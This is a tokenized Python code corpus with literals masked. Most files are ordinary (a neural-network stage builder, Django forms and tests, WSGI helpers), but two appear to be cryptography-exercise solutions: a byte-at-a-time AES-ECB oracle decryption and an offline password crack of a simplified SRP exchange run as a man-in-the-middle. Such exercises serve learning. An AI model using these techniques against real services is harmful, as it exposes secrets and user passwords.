<EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = stageDict [ '<STR_LIT>' ] if stageDict . 
has_key ( '<STR_LIT>' ) else False <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Map ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> activeFn = routeFn ( stageDict [ '<STR_LIT>' ] ) , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> initType = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else '<STR_LIT>' , <EOL> bias = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> biasInitConst = biasInitConst , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeUnfold ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Concat ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> axis = stageDict [ '<STR_LIT>' ] ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = InnerProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeRepeat ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> numRepeats = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ 
'<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeFold ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeReverse ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeFinal ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Reshape ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> reshapeFn = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Dropout ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> dropoutRate = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stages = stageDict [ '<STR_LIT>' ] <EOL> realStages = [ ] <EOL> for i in range ( len ( stages ) ) : <EOL> realStages . 
append ( stageLib [ stages [ i ] ] ) <EOL> stage = Sequential ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> stages = realStages , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ConstWeights ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ConstValue ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> value = stageDict [ '<STR_LIT:value>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = CosSimilarity ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = <NUM_LIT:0> , <EOL> bankDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ElementProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Selector ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> axis = stageDict [ '<STR_LIT>' ] if stageDict . 
has_key ( '<STR_LIT>' ) else - <NUM_LIT:1> , <EOL> start = stageDict [ '<STR_LIT:start>' ] , <EOL> end = stageDict [ '<STR_LIT:end>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Reshape ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> reshapeFn = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Sum ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> numComponents = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ElementProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Active ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> activeFn = routeFn ( stageDict [ '<STR_LIT>' ] ) , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = SumProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> sumAxis = stageDict [ '<STR_LIT>' ] , <EOL> beta = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:1.0> , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stages = stageDict [ '<STR_LIT>' ] <EOL> realStages = [ ] <EOL> for i in range ( len ( stages ) ) : <EOL> realStages . append ( stageLib [ stages [ i ] ] ) <EOL> outputList = stageDict [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( outputList ) ) : <EOL> outputList [ i ] = outputList [ i ] . 
strip ( ) <EOL> stage = RecurrentContainer ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> stages = realStages , <EOL> multiInput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> multiOutput = stageDict [ '<STR_LIT>' ] , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> outputStageNames = outputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = AttentionPenalty ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> errorConst = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Sum2 ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Conv1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> numFilters = stageDict [ '<STR_LIT>' ] , <EOL> numChannels = stageDict [ '<STR_LIT>' ] , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = MaxPool1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict 
[ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = MeanPool1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> mean = h5py . File ( stageDict [ '<STR_LIT>' ] ) [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> std = h5py . File ( stageDict [ '<STR_LIT>' ] ) [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> else : <EOL> mean = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> std = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> stage = Normalize ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> mean = mean , <EOL> std = std , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = OrdinalRegression ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> fixExtreme = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' + stageDict [ '<STR_LIT:type>' ] + '<STR_LIT>' ) <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] : <EOL> stage = RecurrentAdapter ( stage ) <EOL> stageLib [ stageDict [ '<STR_LIT:name>' ] ] = stage <EOL> return stage </s>
<s> from model_test import * <EOL> from view_test import * <EOL> from templatetag_test import * <EOL> __test__ = { <EOL> "<STR_LIT>" : model_test , <EOL> "<STR_LIT>" : view_test , <EOL> "<STR_LIT>" : templatetag_test <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from google . appengine . api . users import create_logout_url , get_current_user <EOL> from gaepermission import facade <EOL> from gaepermission . decorator import login_required <EOL> from tekton . gae . middleware . redirect import RedirectResponse <EOL> @ login_required <EOL> def index ( _resp ) : <EOL> facade . logout ( _resp ) . execute ( ) <EOL> redirect_url = '<STR_LIT:/>' <EOL> google_user = get_current_user ( ) <EOL> if google_user : <EOL> redirect_url = create_logout_url ( redirect_url ) <EOL> return RedirectResponse ( redirect_url ) </s>
<s> from django import forms <EOL> from django . conf import settings <EOL> from repocracy . repo . models import Repository , Remote , RemoteHost <EOL> from repocracy . repo . tasks import clone_repository <EOL> class NewRepoForm ( forms . ModelForm ) : <EOL> def clean_origin ( self ) : <EOL> data = self . cleaned_data [ '<STR_LIT>' ] <EOL> if data [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> if '<STR_LIT:@>' in data : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> if '<STR_LIT:;>' in data : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> return data <EOL> def save ( self , user ) : <EOL> obj = super ( NewRepoForm , self ) . save ( commit = False ) <EOL> obj . name = obj . guess_name ( ) <EOL> if user . is_authenticated ( ) : <EOL> obj . user = user <EOL> obj . slug = obj . get_slug ( ) <EOL> obj . save ( ) <EOL> clone_repository . delay ( obj . pk ) <EOL> return obj <EOL> class Meta : <EOL> model = Repository <EOL> fields = ( '<STR_LIT>' , ) <EOL> class RemoteForm ( forms . ModelForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT:255> ) <EOL> repo_name = forms . CharField ( max_length = <NUM_LIT:255> ) <EOL> remote_url = forms . CharField ( max_length = <NUM_LIT:255> , required = False ) <EOL> type = forms . IntegerField ( widget = forms . RadioSelect ( choices = ( ( <NUM_LIT:0> , '<STR_LIT>' ) , ( <NUM_LIT:1> , '<STR_LIT>' ) ) ) ) <EOL> def clean ( self ) : <EOL> if self . cleaned_data [ '<STR_LIT:type>' ] == <NUM_LIT:0> : <EOL> template = '<STR_LIT>' <EOL> elif self . cleaned_data [ '<STR_LIT:type>' ] == <NUM_LIT:1> : <EOL> template = '<STR_LIT>' <EOL> self . cleaned_data [ '<STR_LIT>' ] = template % ( <EOL> self . cleaned_data [ '<STR_LIT:username>' ] , self . cleaned_data [ '<STR_LIT>' ] ) <EOL> return self . cleaned_data <EOL> class Meta : <EOL> model = Remote <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' ) </s>
<s> try : <EOL> STRING_TYPES = ( str , unicode ) <EOL> except NameError : <EOL> STRING_TYPES = ( str , ) <EOL> try : <EOL> u = unicode <EOL> except NameError : <EOL> u = str <EOL> b = bytes <EOL> else : <EOL> b = str <EOL> import base64 <EOL> if '<STR_LIT>' in base64 . __dict__ : <EOL> decodebytes = base64 . decodebytes <EOL> encodebytes = base64 . encodebytes <EOL> def decodestring ( value ) : <EOL> return base64 . decodebytes ( bytes ( value , '<STR_LIT:ascii>' ) ) . decode ( '<STR_LIT:ascii>' ) <EOL> def encodestring ( value ) : <EOL> return base64 . encodebytes ( bytes ( value , '<STR_LIT:ascii>' ) ) . decode ( '<STR_LIT:ascii>' ) <EOL> else : <EOL> decodebytes = base64 . decodestring <EOL> encodebytes = base64 . encodestring <EOL> decodestring = base64 . decodestring <EOL> encodestring = base64 . encodestring <EOL> try : <EOL> from urllib . parse import parse_qs <EOL> except ImportError : <EOL> from cgi import parse_qs <EOL> from cgi import parse_qsl <EOL> else : <EOL> from urllib . parse import parse_qsl <EOL> try : <EOL> import ConfigParser <EOL> except ImportError : <EOL> from configparser import ConfigParser <EOL> from configparser import ParsingError <EOL> else : <EOL> from ConfigParser import SafeConfigParser as ConfigParser <EOL> from ConfigParser import ParsingError <EOL> try : <EOL> from Cookie import SimpleCookie <EOL> except ImportError : <EOL> from http . cookies import SimpleCookie <EOL> from http . cookies import CookieError <EOL> else : <EOL> from Cookie import CookieError <EOL> try : <EOL> from itertools import izip_longest <EOL> except ImportError : <EOL> from itertools import zip_longest as izip_longest <EOL> try : <EOL> from StringIO import StringIO <EOL> except ImportError : <EOL> from io import StringIO <EOL> try : <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import urlencode <EOL> from urllib . parse import quote as url_quote <EOL> from urllib . 
parse import unquote as url_unquote <EOL> else : <EOL> from urllib import quote as url_quote <EOL> from urllib import unquote as url_unquote <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> from urllib . parse import urlunparse <EOL> else : <EOL> from urlparse import urlunparse <EOL> import wsgiref . util <EOL> import wsgiref . headers <EOL> def REQUEST_METHOD ( environ ) : <EOL> return environ [ '<STR_LIT>' ] <EOL> def CONTENT_TYPE ( environ ) : <EOL> return environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def USER_AGENT ( environ ) : <EOL> return environ . get ( '<STR_LIT>' ) <EOL> def AUTHORIZATION ( environ ) : <EOL> return environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_cookies ( environ ) : <EOL> header = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in environ : <EOL> cookies , check_header = environ [ '<STR_LIT>' ] <EOL> if check_header == header : <EOL> return cookies <EOL> cookies = SimpleCookie ( ) <EOL> try : <EOL> cookies . load ( header ) <EOL> except CookieError : <EOL> pass <EOL> environ [ '<STR_LIT>' ] = ( cookies , header ) <EOL> return cookies <EOL> def construct_url ( environ ) : <EOL> return wsgiref . util . request_uri ( environ ) <EOL> def header_value ( environ , key ) : <EOL> headers = wsgiref . headers . Headers ( environ ) <EOL> values = headers . get ( key ) <EOL> if not values : <EOL> return "<STR_LIT>" <EOL> if isinstance ( values , list ) : <EOL> return "<STR_LIT:U+002C>" . join ( values ) <EOL> else : <EOL> return values <EOL> def must_decode ( value ) : <EOL> if type ( value ) is b : <EOL> try : <EOL> return value . decode ( '<STR_LIT:utf-8>' ) <EOL> except UnicodeDecodeError : <EOL> return value . decode ( '<STR_LIT>' ) <EOL> return value <EOL> def must_encode ( value ) : <EOL> if type ( value ) is u : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return value </s>
<s> def resolveDotted ( dotted_or_ep ) : <EOL> """<STR_LIT>""" <EOL> from pkg_resources import EntryPoint <EOL> return EntryPoint . parse ( '<STR_LIT>' % dotted_or_ep ) . load ( False ) </s>
<s> from prob11 import generateAESKey <EOL> from prob9 import addPKCS7Padding <EOL> from prob10 import aes_ecb_enc <EOL> from prob1 import base64toRaw <EOL> from prob8 import chunks <EOL> global_aes_key = generateAESKey ( ) ; <EOL> def constant_ecb_encrypt ( rawInput ) : <EOL> return aes_ecb_enc ( addPKCS7Padding ( rawInput , <NUM_LIT:16> ) , global_aes_key ) ; <EOL> def append_and_encrypt ( rawInput ) : <EOL> unknownB64 = b'<STR_LIT>' + b'<STR_LIT>' + b'<STR_LIT>' + b'<STR_LIT>' <EOL> unknownRaw = base64toRaw ( unknownB64 ) ; <EOL> return constant_ecb_encrypt ( rawInput + unknownRaw ) ; <EOL> def determineBlockSize ( ) : <EOL> plaintext = b'<STR_LIT>' ; <EOL> size1 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> size2 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> while ( size1 == size2 ) : <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> size2 = len ( append_and_encrypt ( plaintext ) ) ; <EOL> return ( size2 - size1 ) ; <EOL> def determinePlaintextLength ( ) : <EOL> plaintext = b'<STR_LIT>' ; <EOL> emptyCipherLength = len ( append_and_encrypt ( plaintext ) ) ; <EOL> maxPlaintextLength = emptyCipherLength - <NUM_LIT:1> ; <EOL> while ( True ) : <EOL> plaintext += b'<STR_LIT:A>' ; <EOL> thisCipherLength = len ( append_and_encrypt ( plaintext ) ) ; <EOL> if ( thisCipherLength == emptyCipherLength ) : <EOL> maxPlaintextLength -= <NUM_LIT:1> ; <EOL> else : <EOL> return maxPlaintextLength ; <EOL> def detectMode ( ) : <EOL> plaintext = b'<STR_LIT:A>' * <NUM_LIT> ; <EOL> cipher = append_and_encrypt ( plaintext ) ; <EOL> blocks = chunks ( cipher , <NUM_LIT:16> ) ; <EOL> if ( blocks [ <NUM_LIT:1> ] == blocks [ <NUM_LIT:2> ] ) : <EOL> return "<STR_LIT>" ; <EOL> else : <EOL> return "<STR_LIT>" ; <EOL> padStr = b'<STR_LIT:A>' ; <EOL> def determineNextByte ( rawPrefix , observedCipher ) : <EOL> '''<STR_LIT>''' <EOL> blockSize = determineBlockSize ( ) <EOL> plain = ( padStr ) * ( blockSize - <NUM_LIT:1> - len ( rawPrefix ) ) ; <EOL> plain += 
rawPrefix ; <EOL> for i in range ( <NUM_LIT> ) : <EOL> thisPlain = plain + bytes ( chr ( i ) , '<STR_LIT>' ) ; <EOL> thisCipher = append_and_encrypt ( thisPlain ) ; <EOL> if ( chunks ( thisCipher , blockSize ) [ <NUM_LIT:0> ] == observedCipher ) : <EOL> return bytes ( chr ( i ) , '<STR_LIT>' ) ; <EOL> return b'<STR_LIT>' ; <EOL> def determinePlaintext ( ) : <EOL> blockSize = determineBlockSize ( ) <EOL> plaintextLength = determinePlaintextLength ( ) ; <EOL> knownPlaintext = b'<STR_LIT>' ; <EOL> for i in range ( plaintextLength ) : <EOL> padLen = ( blockSize - <NUM_LIT:1> ) - ( len ( knownPlaintext ) % blockSize ) ; <EOL> pad = padStr * padLen ; <EOL> cipherOutput = append_and_encrypt ( pad ) ; <EOL> blockOfInterest = len ( knownPlaintext ) // <NUM_LIT:16> ; <EOL> cipherChunks = chunks ( cipherOutput , blockSize ) ; <EOL> cipherOfInterest = cipherChunks [ blockOfInterest ] ; <EOL> prefix = ( pad + knownPlaintext ) [ - <NUM_LIT:15> : ] ; <EOL> knownPlaintext += determineNextByte ( prefix , cipherOfInterest ) ; <EOL> return knownPlaintext ; <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> print ( "<STR_LIT>" + str ( determineBlockSize ( ) ) ) ; <EOL> print ( "<STR_LIT>" + detectMode ( ) ) ; <EOL> print ( "<STR_LIT>" + str ( determinePlaintext ( ) ) ) ; </s>
<s> from prob36 import SRP_step1 , SRP_step2 , myhmac , SRP_init <EOL> from random import randrange <EOL> from prob33 import mypow , intToBytes <EOL> from hashlib import sha256 <EOL> simplified_SRP_step1 = SRP_step1 ; <EOL> simplified_SRP_step2 = SRP_step2 ; <EOL> def simplified_SRP_step3 ( state ) : <EOL> state [ "<STR_LIT:b>" ] = randrange ( <NUM_LIT:2> , state [ "<STR_LIT:p>" ] - <NUM_LIT:2> ) ; <EOL> state [ "<STR_LIT:B>" ] = mypow ( state [ "<STR_LIT:g>" ] , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT:u>" ] = randrange ( <NUM_LIT:2> , <NUM_LIT:2> ** <NUM_LIT> ) ; <EOL> return state ; <EOL> def simplified_SRP_step4 ( state ) : <EOL> x = sha256 ( intToBytes ( state [ "<STR_LIT>" ] ) + state [ "<STR_LIT:P>" ] ) . hexdigest ( ) ; <EOL> S = mypow ( state [ "<STR_LIT:B>" ] , state [ "<STR_LIT:a>" ] + state [ "<STR_LIT:u>" ] * int ( x , <NUM_LIT:16> ) , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT>" ] = sha256 ( intToBytes ( S ) ) . digest ( ) ; <EOL> return state ; <EOL> def simplified_SRP_step5 ( state ) : <EOL> S = mypow ( state [ "<STR_LIT:A>" ] * mypow ( state [ "<STR_LIT:v>" ] , state [ "<STR_LIT:u>" ] , state [ "<STR_LIT:p>" ] ) , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> state [ "<STR_LIT>" ] = sha256 ( intToBytes ( S ) ) . 
digest ( ) ; <EOL> return state ; <EOL> def simplified_SRP_step6 ( state ) : <EOL> state [ "<STR_LIT>" ] = myhmac ( sha256 , state [ "<STR_LIT>" ] , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return state ; <EOL> def simplified_SRP_validate ( state ) : <EOL> expected = myhmac ( sha256 , state [ "<STR_LIT>" ] , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return expected == state [ "<STR_LIT>" ] ; <EOL> def test_simplified_SRP ( ) : <EOL> state = SRP_init ( ) ; <EOL> state = simplified_SRP_step1 ( state ) ; <EOL> state = simplified_SRP_step2 ( state ) ; <EOL> state = simplified_SRP_step3 ( state ) ; <EOL> state = simplified_SRP_step4 ( state ) ; <EOL> state = simplified_SRP_step5 ( state ) ; <EOL> state = simplified_SRP_step6 ( state ) ; <EOL> assert ( simplified_SRP_validate ( state ) ) ; <EOL> '''<STR_LIT>''' <EOL> def run_simplified_SRP_MITM ( ) : <EOL> state = SRP_init ( ) ; <EOL> state = simplified_SRP_step1 ( state ) ; <EOL> state = simplified_SRP_step2 ( state ) ; <EOL> state = simplified_SRP_step3 ( state ) ; <EOL> state = simplified_SRP_step4 ( state ) ; <EOL> state = simplified_SRP_step5 ( state ) ; <EOL> state = simplified_SRP_step6 ( state ) ; <EOL> return state ; <EOL> def try_simplified_SRP_password ( state , guess ) : <EOL> x = sha256 ( intToBytes ( state [ "<STR_LIT>" ] ) + guess ) . hexdigest ( ) ; <EOL> v = mypow ( state [ "<STR_LIT:g>" ] , int ( x , <NUM_LIT:16> ) , state [ "<STR_LIT:p>" ] ) ; <EOL> v_u = mypow ( v , state [ "<STR_LIT:u>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> S = mypow ( state [ "<STR_LIT:A>" ] * v_u , state [ "<STR_LIT:b>" ] , state [ "<STR_LIT:p>" ] ) ; <EOL> mychal = myhmac ( sha256 , sha256 ( intToBytes ( S ) ) . 
digest ( ) , intToBytes ( state [ "<STR_LIT>" ] ) ) ; <EOL> return mychal == state [ "<STR_LIT>" ] ; <EOL> def crack_simplified_SRP ( ) : <EOL> state = run_simplified_SRP_MITM ( ) ; <EOL> pw_guess_list = [ b'<STR_LIT>' , b'<STR_LIT>' , state [ "<STR_LIT:P>" ] , b'<STR_LIT>' ] <EOL> success = False ; <EOL> pw = None ; <EOL> for guess in pw_guess_list : <EOL> if ( try_simplified_SRP_password ( state , guess ) ) : <EOL> success = True ; <EOL> pw = guess ; <EOL> assert ( success ) ; <EOL> assert ( pw == state [ "<STR_LIT:P>" ] ) ; <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_simplified_SRP ( ) ; <EOL> crack_simplified_SRP ( ) ; <EOL> print ( "<STR_LIT>" ) ; </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path <EOL> import re <EOL> try : <EOL> from urllib . parse import urlparse <EOL> except ImportError : <EOL> from urlparse import urlparse <EOL> import logging <EOL> class MapperError ( Exception ) : <EOL> pass <EOL> class Mapper ( ) : <EOL> def __init__ ( self , mappings = None , use_default_path = False ) : <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . mappings = [ ] <EOL> if ( mappings ) : <EOL> self . parse ( mappings , use_default_path ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( len ( self . mappings ) ) <EOL> def parse ( self , mappings , use_default_path = False ) : <EOL> """<STR_LIT>""" <EOL> if ( use_default_path and <EOL> len ( mappings ) == <NUM_LIT:1> and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:0> ] ) == None ) : <EOL> path = self . path_from_uri ( mappings [ <NUM_LIT:0> ] ) <EOL> self . logger . warning ( "<STR_LIT>" % ( mappings [ <NUM_LIT:0> ] , path ) ) <EOL> self . mappings . append ( Map ( mappings [ <NUM_LIT:0> ] , path ) ) <EOL> elif ( len ( mappings ) == <NUM_LIT:2> and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:0> ] ) == None and <EOL> re . search ( r"<STR_LIT:=>" , mappings [ <NUM_LIT:1> ] ) == None ) : <EOL> self . mappings . append ( Map ( mappings [ <NUM_LIT:0> ] , mappings [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> for mapping in mappings : <EOL> l = mapping . split ( '<STR_LIT:=>' ) 